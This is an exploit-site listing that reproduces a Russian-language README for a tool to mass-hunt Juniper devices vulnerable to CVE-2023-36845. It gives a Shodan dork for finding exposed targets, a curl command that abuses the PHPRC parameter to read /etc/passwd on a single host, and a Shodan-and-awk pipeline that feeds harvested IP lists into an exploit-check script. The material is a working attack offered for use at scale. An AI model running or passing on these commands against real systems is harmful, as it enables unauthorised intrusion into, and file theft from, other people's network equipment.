Sploitus

Exploit for Juniper-CVE-2023-36845-Mass-Hunting

kitploit · 2026-08-27

Exploit Code

MARKDOWN24 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAHITHOQUE-JUNIPER-CVE-2023-36845-MASS-HUNTING
# Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (удаленное выполнение кода) CVE-2023-36845 — это уязвимость, обнаруженная в программном обеспечении Juniper. Эта конкретная ошибка позволяет удаленно выполнять код, то есть злоумышленник может запускать произвольный код в системе без необходимости физического доступа к устройству.

## Как найти:

Shodan dork: http.favicon.hash:2141724739

используйте с другими соответствующими dorks, такими как сертификаты SSL, название организации и т.д., для более целенаправленного поиска.

## Эксплуатация для одного хоста:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’

## Автоматизация:

└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #загрузка из Shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt ![IMAGE](https://assets.kitploit.com/production/public/readmes/27266/65b8bd1edc01324fc26b4343857c28afd09ca2f62c0233aee4f8e885b6389f96.jpg)